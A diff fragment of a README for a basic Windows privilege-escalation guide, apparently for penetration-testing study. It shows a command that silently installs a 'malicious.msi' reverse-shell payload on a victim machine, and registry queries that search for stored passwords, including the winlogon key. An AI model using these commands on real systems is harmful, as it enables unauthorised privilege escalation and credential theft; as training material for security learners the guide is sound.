NotAnoobis/Windows-PrivEsc-basic-guide/README.md

 Create a reverse shell and upload it to the victim machine and use the following command to execute it:

 msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

+### Password hunting

+You can query the registries that are containing the word password with the following command:

+reg query HKLM /f password /t REG_SZ /s

+You can check each registry with the reg query command for more information.

+e.g: reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"

+Pretty time consuming doing it manually, but if nothing works give it a go, otherwise use automated tools for this task.